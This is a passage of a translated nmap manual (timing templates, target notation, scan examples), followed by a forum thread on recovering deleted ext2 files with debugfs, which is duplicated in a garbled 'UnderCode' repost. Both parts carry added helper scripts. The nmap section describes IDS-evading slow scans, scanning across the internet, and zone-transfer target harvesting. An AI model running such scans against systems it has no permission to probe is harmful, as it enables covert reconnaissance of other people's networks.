This is a convenient way of expressing timing policy priorities to nmap. Paranoid mode scans very slowly in the hope of avoiding being logged by intrusion detection systems: it serializes all probes (no parallel scanning) and usually waits at least five minutes between sending packets. Sneaky is similar, except that it waits only 15 seconds between packets. Polite mode is meant to ease network load and reduce the chance of crashing machines: it sends probes one after another and waits 0.4 seconds between them. Normal is the default nmap behaviour, which tries to run as fast as possible without overloading the network or losing hosts/ports. Aggressive mode adds a five-minute timeout per host and never waits more than 1.25 seconds for probe responses. Insane is only suitable for very fast networks or when you don't care about losing some information, because it is so fast: its host timeout is 75 seconds and it waits only 0.3 seconds for each response. It allows "sweeping" a fast network :). You can also use numbers (0-5) for these modes, e.g. '-T 0' means Paranoid and '-T 5' means Insane. Note that these timing templates cannot be used in combination with the lower-level controls given below.
--host_timeout
Specifies the total time nmap may spend scanning a single IP before giving up on it. There is no host timeout by default.
--max_rtt_timeout
Specifies the maximum time nmap will wait for a response to a probe from the remote end before retransmitting or timing out. The default is 9000 (in milliseconds).
--initial_rtt_timeout
Specifies the timeout for the initial probes. This is mostly useful when scanning hosts protected by a firewall with -P0, since nmap would otherwise obtain a good RTT estimate from the ping and the first few probes. The default is 6000 (in milliseconds).
--max_parallelism
Specifies the maximum number of probes nmap may have outstanding in parallel. Setting it to 1 means nmap scans only one port at a time. It also affects other parallel operations such as the ping sweep and the RPC scan.
--scan_delay
Specifies the minimum time nmap must wait between two probes. This is a way to reduce network load and to make the scan less conspicuous to intrusion detection systems.
Target description
------------------
All arguments that are not options are treated by nmap as target host descriptions. The simplest case is to list a single host name or IP address on the command line. To scan a subnet, append '/mask' to the host name or IP address. The mask must be between 0 (the whole network) and 32 (a single host). Use /24 to scan a class C network and /16 to scan a class B network.
...
nmap also has a more powerful notation that lets you give a list or range for each element of an IP address. For example, to scan the class B network 128.210.*.*, you can use '128.210.*.*', '128.210.0-255.0-255', or even '128.210.1-50,51-255.1,2,3,4,5-255'. Of course you can also use the mask notation mentioned above: '128.210.0.0/16'. All of these are equivalent. Remember that most shells require you to quote the argument when you use '*'.
Another interesting thing is that you can "split" the whole network in other ways. For example, you can use '*.*.5.6-7' to scan all IP addresses ending in .5.6 or .5.7. For more information, see the examples section.
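As an added example (not part of the nmap documentation quoted here), this Python snippet implements the octet list/range and '/mask' target notation described above, so you can count or enumerate the addresses a specification covers and check that all of them fall inside an authorized block before a scan is run. It handles numeric specifications only (host names with '/mask' are not resolved); the `all_within` scope check is my addition.

```python
from ipaddress import ip_address, ip_network
from itertools import product
from math import prod
from typing import Iterator, List


def _octet_values(spec: str) -> List[int]:
    """Expand one octet spec: '*', 'n', 'a-b', or a comma-separated list of those."""
    if spec == "*":
        return list(range(256))
    values = set()
    for item in spec.split(","):
        lo, _, hi = item.partition("-")
        lo_i = int(lo)
        hi_i = int(hi) if hi else lo_i
        if not 0 <= lo_i <= hi_i <= 255:
            raise ValueError(f"bad octet range: {item!r}")
        values.update(range(lo_i, hi_i + 1))
    return sorted(values)


def _octet_sets(spec: str) -> List[List[int]]:
    parts = spec.split(".")
    if len(parts) != 4:
        raise ValueError(f"expected four dotted octets: {spec!r}")
    return [_octet_values(p) for p in parts]


def _normalize(spec: str) -> str:
    # Tolerate the stray spaces ('128.210. *. *') that copy/paste tends to introduce
    return spec.replace(" ", "")


def count_targets(spec: str) -> int:
    """Number of addresses a target spec covers, computed without enumerating them."""
    spec = _normalize(spec)
    if "/" in spec:
        return ip_network(spec, strict=False).num_addresses
    return prod(len(s) for s in _octet_sets(spec))


def expand_targets(spec: str) -> Iterator[str]:
    """Yield every address covered by a numeric spec (octet lists/ranges or a.b.c.d/mask)."""
    spec = _normalize(spec)
    if "/" in spec:
        for host in ip_network(spec, strict=False):
            yield str(host)
        return
    for octets in product(*_octet_sets(spec)):
        yield ".".join(map(str, octets))


def all_within(spec: str, authorized: str) -> bool:
    """True if every address the spec expands to lies inside the authorized CIDR block."""
    allowed = ip_network(authorized, strict=False)
    return all(ip_address(a) in allowed for a in expand_targets(spec))


if __name__ == "__main__":
    for s in ("128.210.*.*", "128.210.0.0/16", "128.210.1-50,51-255.1,2,3,4,5-255", "*.*.5.6-7"):
        print(f"{s:40s} {count_targets(s):7d} addresses")
```

Note that the ranges starting at 1 in '128.210.1-50,51-255.1,2,3,4,5-255' leave out octet value 0, so its count is 65025 rather than the 65536 of '128.210.*.*'.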
Scanning examples
-----------------
Here are some examples of using nmap, from the simple to the somewhat complex. Note that actual numbers and some real domain names are used, to make things more concrete; replace the addresses/names with those of your own network. Although the analysis of port scan results may make some people uneasy, I don't think it is illegal. I have scanned hundreds or thousands of machines and received only one complaint. But I am not a lawyer, and some people do object to nmap probes, so it is best to get permission before scanning, or scan at your own risk.
nmap -v target.example.com
This scans all reserved TCP ports on target.example.com; -v means verbose mode.
nmap -sS -O target.example.com/24
This launches a SYN (half-open) scan against the class C subnet where target.example.com lives, and also tries to determine what operating system each host is running. This requires root privileges because of the half-open scan and the OS detection.
nmap -sX -p 22,53,110,143,4564 128.210.*.1-127
This sends an Xmas tree scan to the first half of each subnet in the class B network 128.210, checking whether the systems are running sshd, DNS, pop3d, imapd, or anything on port 4564. Note that Xmas scanning does not work against Microsoft platforms because of their deficient TCP stack; the same problem may exist on Cisco, IRIX, HP/UX and BSDI.
nmap -v -p 80 '*.*.2.3-5'
Rather than focusing on one network, this divides the whole address space into many small parts and scans all IP addresses ending in .2.3, .2.4 or .2.5. Use -sS as well if you are root. Similarly, you will find more interesting machines starting from 127, so you could replace the leading asterisk with '127-222'; IMHO there are a lot of interesting machines in that range.
host -l company.com | cut '-d ' -f 4 | ./nmap -v -i -
This does a DNS zone transfer to find the hosts in company.com and feeds their IP addresses to nmap. The command works on my GNU/Linux box; you may need different options or a different approach on other operating systems.
Bugs
----
Bugs? What bugs? If you find one, please tell me, and the next version will be more perfect :). Remember to send me the OS "fingerprints" as well, so that I have enough data to make corrections...
Author
------
Fyodor
Distribution
------------
The latest version of nmap can be obtained from the following URL (copyright information follows):
http://www.insecure.org/nmap/
nmap is (C) 1997, 1998, 1999 by Fyodor (fyodor@dhp.com, fyodor@insecure.org)
libpcap is also distributed along with nmap. It is copyrighted by Van Jacobson, Craig Leres and Steven McCanne, all of the Lawrence Berkeley National Laboratory, University of California, Berkeley, CA. The version distributed with nmap may be modified; pristine sources are available from ftp://ftp.ee.lbl.gov/libpcap.tar.Z.
NMAP 3
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; Version 2. This guarantees your right to use, modify, and redistribute Nmap under certain conditions. If this license is unacceptable to you, Insecure.Org may be willing to sell alternative licenses (contact fyodor@dhp.com).
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details (it is in the COPYING file of the nmap distribution).
It should also be noted that Nmap has been known to crash certain poorly written applications, TCP / IP stacks, and even operating systems. Nmap should never be run against mission critical systems unless you are prepared to suffer downtime. We acknowledge here that Nmap may crash your systems or networks and we disclaim all liability for any damage or problems Nmap could cause.
All versions of Nmap equal to or greater than 2.0 are believed (through informal testing) to be Year 2000 (Y2K) compliant in all respects. That being said, we reiterate that Nmap comes with no warranty. There is no reason to believe versions earlier than 2.0 are susceptible to problems, but we have not tested them.
Attached:
The operating platforms of nmap
Portability
-----------
nmap is developed under Linux, but it now runs on many platforms. Thanks to Lamont Granquist for his great help in running the nmap automated test console on many platforms I cannot access. The following is a brief list of systems that nmap supports:
OS                      Compiles  TCP scan (-sT)  SYN scan (-sS)  FIN scan (-sF)  Frag scan (-f)  OS Detection (-O)
Linux                   Yes!      Yes!            Yes!            Yes!            Yes!            Yes!
FreeBSD                 Yes!      Yes!            Yes!            Yes!            Yes!            Yes!
OpenBSD                 Yes!      Yes!            Yes!            Yes!            Yes!            Yes!
NetBSD                  Yes!      Yes!            Yes!            Yes!            Yes!            Yes!
Solaris 2.4-7           Yes!      Yes!            Yes!            Yes!            No :(           Yes!
SunOS 4.1.4 w/ gcc      Yes!      Yes!            Yes!            Yes!            No :(           Yes!
IRIX 5.3-6.4            Yes!      Yes!            Yes!            Yes!            No :(           Yes!
HP/UX 10.20             Yes!      Yes!            Yes!            Yes!            Yes!            Unknown
BSDI 2.1 and up         Yes!      Yes!            Yes!            Yes!            Unknown         Yes!
AIX (use cc, not gcc)   Yes!      Yes!            No :(           No :(           No :(           No :(
Digital UNIX / Alpha    Yes!      Yes!            POSSIBLE KERNEL PANIC!
Cray UNICOS 10.0        Yes!      Yes!            No :(           No :(           No :(           No :(
Miscellaneous Tools: Recover Deleted Files in an ext2 File System
1) If you accidentally deleted an important file, say with rm -rf kkk where kkk is a very important file of yours, you must be very upset. Do not panic: stop writing anything to the hard disk immediately. It is completely recoverable. (The following is written specifically for the ext2 file system; other file systems have their own methods, which I will write about later):
# debugfs /dev/hda1 (the partition where the deleted file was located)
debugfs: lsdel
This lists the inodes of recently deleted files, roughly as follows:
2) Inode Owner Mode Size Blocks Time deleted
3) These columns are the inode number, owner, file mode (the read/write permission bits), size, number of blocks (generally 1 block = 1K) and deletion time. With this information you should be able to quickly determine which file you want to recover. Then use
debugfs: dump <inode number you want to restore> /home/directory (the destination path; the angle brackets around the inode number are typed literally)
OK! It's that simple; you will find the file under /home/directory.
4) Of course, if you have many files, doing this one by one is troublesome; you can download a tool for it. Here is one:
http://revocer.sourceforge.net/linux/recover.
Everyone, try it. If you run into any difficulties, post them here.
5) While practising this, the brothers got the following output and did not know how to deal with it. Please enlighten me.
311543 0 100600 7603556 14/14 Wed Oct 2 18:39:21 2002
586046 0 100644 7044 2/2 Wed Oct 2 18:51:50 2002
760593 0 100600 363 1/1 Wed Oct 2 18:53:35 2002
9551 deleted inodes found.
debugfs: dump 311543
dump: Usage: dump_inode [-p] <file> <output_file>
debugfs: dump 311543 / root
311543: File not found by ext2_lookup
debugfs:
6) I want to restore inode 311543, because I deleted a file in the /root directory and saw that it was 311543, but when I used the command above to restore it, the prompt above appeared.
7) You should do it like this:
debugfs: dump <311543> /root/ppp (any file name)
Try again. Did you succeed?
8) I am now under Windows, and my Linux uses JFS, so recovery is more convenient. Wait until I switch to Linux and build an ext2 system; I have tried it before, and it must be
9) OK. Dude, you're terrific. Do as he says and it will work.
Now my brother has a question: I deleted a .tar.gz file, but after restoring it I cannot extract it with
#tar zxvf *tar.gz
10) The other question is how to restore the original file name. For example, I deleted wine.tar.gz but cannot remember the exact file name, and I want to restore the original name. Or I deleted an important system file whose name I don't remember, but which is extremely important to the system, such as mozilla under /usr/bin. How can I do this?
11) The main thing is to understand why. The answer is simple. To find the file name, use
debugfs: ls -d
12) As for the file not being usable: dump copies contiguous blocks, and your file may not be stored in contiguous blocks.
Use debugfs: stat <inode> to see its block layout, then dd the blocks out one by one (of course there are tools that save a lot of effort).
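An added example, not from the thread above: a Python parser for the lsdel listing that turns each row into a record, flags inodes whose data blocks have already been partly reused (as I read the Blocks column, it is blocks still free / blocks the file had, so a file is fully recoverable only when the two are equal), and generates the `dump <inode> path` lines with the angle brackets that the failed attempt in the thread was missing. The sample listing is constructed from the rows quoted above plus one partially overwritten inode; the destination directory is an assumption.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional

# One lsdel row: inode, owner, octal mode, size, "found/total" blocks, then a ctime string
_LSDEL_ROW = re.compile(
    r"^\s*(\d+)\s+(\d+)\s+([0-7]+)\s+(\d+)\s+(\d+)\s*/\s*(\d+)\s+(\S.*\S)\s*$"
)

# Constructed sample modelled on the lsdel listing quoted in the thread; the fourth
# row is added to show an inode whose data blocks are no longer all available.
SAMPLE_LSDEL = """\
 Inode  Owner  Mode    Size      Blocks   Time deleted
311543      0 100600 7603556  14/ 14 Wed Oct  2 18:39:21 2002
586046      0 100644    7044   2/  2 Wed Oct  2 18:51:50 2002
760593      0 100600     363   1/  1 Wed Oct  2 18:53:35 2002
123456   1000 100644   20480   3/  5 Wed Oct  2 19:02:11 2002
4 deleted inodes found.
"""


@dataclass
class DeletedInode:
    inode: int
    owner: int
    mode: int            # st_mode as an integer; lsdel prints it in octal
    size: int
    blocks_found: int    # data blocks still free, i.e. still holding the old contents
    blocks_total: int    # data blocks the file had when it was deleted
    deleted: datetime

    @property
    def is_regular_file(self) -> bool:
        return (self.mode & 0o170000) == 0o100000

    @property
    def complete(self) -> bool:
        # dump can only give back the whole file if every block is still there
        return self.blocks_found == self.blocks_total


def parse_lsdel(text: str) -> List[DeletedInode]:
    """Parse the table printed by `debugfs: lsdel`; header and summary lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = _LSDEL_ROW.match(line)
        if not m:
            continue
        when = datetime.strptime(" ".join(m.group(7).split()), "%a %b %d %H:%M:%S %Y")
        entries.append(DeletedInode(int(m.group(1)), int(m.group(2)), int(m.group(3), 8),
                                    int(m.group(4)), int(m.group(5)), int(m.group(6)), when))
    return entries


def incomplete(entries: List[DeletedInode]) -> List[DeletedInode]:
    """Inodes whose blocks were partly reused: dump output for these will be damaged."""
    return [e for e in entries if not e.complete]


def dump_commands(entries: List[DeletedInode], dest_dir: str,
                  since: Optional[datetime] = None, owner: Optional[int] = None) -> List[str]:
    """Build `dump <inode> path` lines (note the angle brackets) for regular files,
    optionally limited to one owner and to deletions at or after `since`."""
    cmds = []
    for e in entries:
        if not e.is_regular_file:
            continue
        if owner is not None and e.owner != owner:
            continue
        if since is not None and e.deleted < since:
            continue
        cmds.append(f"dump <{e.inode}> {dest_dir}/inode_{e.inode}")
    return cmds


if __name__ == "__main__":
    found = parse_lsdel(SAMPLE_LSDEL)
    for cmd in dump_commands(found, "/mnt/recover"):
        print(cmd)
    for e in incomplete(found):
        print(f"# inode {e.inode}: only {e.blocks_found}/{e.blocks_total} blocks left, expect damage")
```

The generated lines can be saved to a file and run non-interactively with debugfs -f <file> /dev/hda1, preferably against a read-only image of the partition rather than the live disk.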
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Miscellaneous Tools-Recover Deleted Files in ext2 File System :
twitter.com/UnderCodeNews
π¦ ππΌππ πππΈβπ :
1) if you accidentally accidentally deleted an important file, such as rm -rf kkk And kkk is a very important file for you, you must be very painful, at this time you must not panic, you should stop writing any files to your hard disk immediately. It is completely recoverable. (I wrote the following specifically for the ext2 file system, other file systems have methods, I will write later):
#debugfs / dev / hda1 (the partition where the deleted file is located)
debugfs: lsdel
can list your recent The inode table of the deleted file is roughly as follows:
2) Inode Owner Mode Size Blocks Time deleted
3) The columns are the inode number, the owner, the file mode (the read, write and other permission bits), the size, the block count (generally 1 block = 1K) and the deletion time. With this information you should be able to quickly determine which file you want to recover. Then use
debugfs: dump <inode number you want to restore> /home/directory/filename (the angle brackets are literal debugfs syntax marking an inode number rather than a path; the second argument is the file to write the data to)
OK! It's that simple; you will then find the file under /home/directory.
4) Of course, if you have a lot of files, doing this one by one is definitely troublesome; you can download tools for it. Here is one:
http://revocer.sourceforge.net/linux/recover.
Everyone, try it. If you have any difficulties, please post them here.
5) While the brothers were practising, the following output appeared and they did not know how to deal with it. Please enlighten me.
311543 0 100600 7603556 14/14 Wed Oct 2 18:39:21 2002
586046 0 100644 7044 2/2 Wed Oct 2 18:51:50 2002
760593 0 100600 363 1/1 Wed Oct 2 18:53:35 2002
9551 deleted inodes found.
debugfs: dump 311543
dump: Usage: dump_inode [-p] <file> <output_file>
debugfs: dump 311543 /root
311543: File not found by ext2_lookup
debugfs:
6) I want to restore 311543 because I deleted a file in the /root directory and saw that it was 311543, but when I used the command above to restore it, the prompt shown above appeared.
7) You should do it like this:
debugfs: dump <311543> /root/ppp (any file name)
Try again. Did you succeed?
8) I am now under Windows, and my Linux uses JFS, so recovery is more convenient. Wait until I switch to Linux and build an ext2 system; I have tried it before, and it must be
9) OK. Dude, you're terrific; serve it and it will be OK.
Now my brother has a question: I deleted a .tar.gz file, but after the restoration is complete, I cannot extract it with
# tar zxvf *.tar.gz
10) The other question is how to restore the original file name. For example, I deleted wine.tar.gz but can't remember what the exact file name was, and I want to restore it under its original name. Or say I deleted an important file in the system and don't remember its name, but that name is extremely important to the system, such as mozilla under /usr/bin. How can I do this?
11) The main thing is to know why. The answer is simple. To find the file name, use
debugfs: ls -d
12) As for the file not being usable: dump copies a continuous run of blocks, but your file may not be stored in continuous blocks.
Use debugfs: stat <inode> to see its status, and then dd the blocks out one by one (of course there are tools that save a lot of effort).
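The following script is an added example written for this page; it is not code from the original post or from UnderCode. It automates the two manual steps discussed above (items 1-3 and item 12): picking candidate inodes out of lsdel output and building the non-interactive debugfs dump command, and then, for a file whose data blocks are not contiguous, copying the blocks listed by stat out with dd one at a time. The device name /dev/hda1, the lsdel table, the BLOCKS extents line and the 1K block size are assumptions or constructed sample data; the stand-in "disk" is a zeroed file with the pieces of a file placed in non-contiguous blocks, so the whole thing runs offline. It goes slightly beyond the post in skipping the (IND)/(DIND)/(TIND) indirect-block entries that a real stat listing contains, since those hold block pointers rather than file data.

```shell
#!/bin/sh
# Added example, not code from the original post. Automates the two steps
# discussed above: picking candidate inodes from "lsdel" output and, for a
# file whose data blocks are not contiguous, copying the blocks listed by
# "stat" out with dd one by one. All inode numbers, the lsdel table, the
# BLOCKS line and the device name are constructed sample data.

# Constructed lsdel output, mimicking the table shown in item 5 above.
LSDEL_SAMPLE='311543 0 100600 7603556 14/14 Wed Oct 2 18:39:21 2002
586046 0 100644 7044 2/2 Wed Oct 2 18:51:50 2002
760593 0 100600 363 1/1 Wed Oct 2 18:53:35 2002
9551 deleted inodes found.'

# Print the inode numbers of deleted files whose size is at least $1 bytes.
# lsdel columns: Inode Owner Mode Size Blocks Time-deleted
lsdel_candidates() {
    printf '%s\n' "$LSDEL_SAMPLE" |
        awk -v min="$1" '$1 ~ /^[0-9]+$/ && NF >= 5 && $4 >= min { print $1 }'
}

# Build the non-interactive form of the dump command (debugfs -R runs one
# command and exits). The angle brackets are debugfs syntax for "inode
# number"; without them "dump 311543 /root" in item 5 was looked up as a
# file named 311543, hence "File not found by ext2_lookup".
dump_command() {
    printf 'debugfs -R "dump <%s> %s" %s\n' "$2" "$3" "$1"
}

# Expand the block extents printed by "stat <inode>", for example
#   (0-1):5-6, (IND):7, (2):9
# into one device block number per line, in file order, skipping the
# indirect-block entries (IND/DIND/TIND), which hold pointers, not data.
expand_blocks() {
    printf '%s\n' "$1" | sed 's/^BLOCKS://' | tr ',' '\n' | while read -r ext; do
        case "$ext" in *IND*) continue ;; esac      # pointer block, not data
        case "$ext" in *:*) ;; *) continue ;; esac  # not an extent entry
        range=${ext#*:}                              # drop the "(logical)" part
        case "$range" in
            *-*) i=${range%-*}
                 while [ "$i" -le "${range#*-}" ]; do
                     printf '%s\n' "$i"; i=$((i + 1))
                 done ;;
            *)   printf '%s\n' "$range" ;;
        esac
    done
}

# Copy the listed blocks ($3) from device $1, in order, appending each to $2.
# Block size defaults to 1024 as assumed in item 3; confirm the real value
# with "debugfs -R stats <device>" before relying on it.
reassemble() {
    bs=${4:-1024}
    : > "$2"
    for b in $3; do
        dd if="$1" bs="$bs" skip="$b" count=1 2>/dev/null >> "$2"
    done
}

# Constructed stand-in for the disk: 16 zeroed 1K blocks with the three pieces
# of a file written into the non-contiguous blocks 5, 6 and 9.
make_demo_device() {
    dd if=/dev/zero of="$1" bs=1024 count=16 2>/dev/null
    printf 'first block of recovered file\n' | dd of="$1" bs=1024 seek=5 conv=notrunc 2>/dev/null
    printf 'second block\n'                  | dd of="$1" bs=1024 seek=6 conv=notrunc 2>/dev/null
    printf 'third block after a gap\n'       | dd of="$1" bs=1024 seek=9 conv=notrunc 2>/dev/null
}

# End-to-end demonstration on the constructed device: returns the recovered
# text with the zero padding of each 1K block stripped.
recovered_text() {
    dev=${TMPDIR:-/tmp}/ext2-demo.img
    out=${TMPDIR:-/tmp}/ext2-demo.out
    make_demo_device "$dev"
    reassemble "$dev" "$out" "$(expand_blocks '(0-1):5-6, (IND):7, (2):9')"
    tr -d '\000' < "$out"
    rm -f "$dev" "$out"
}

# Usage on a real system (prints the command for review, does not run it):
#   dump_command /dev/hda1 "$(lsdel_candidates 1000 | head -n 1)" /root/ppp
```

The reassembly step is the part that matters for item 12: the blocks come out in the order the inode's block map lists them, so a file scattered across the disk is stitched back together correctly as long as its indirect blocks have not been reused. When recovering for real, mount the partition read-only (or work from an image taken with dd) so that nothing allocates over the freed blocks while you are working.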
WRITTEN BY UNDERCODE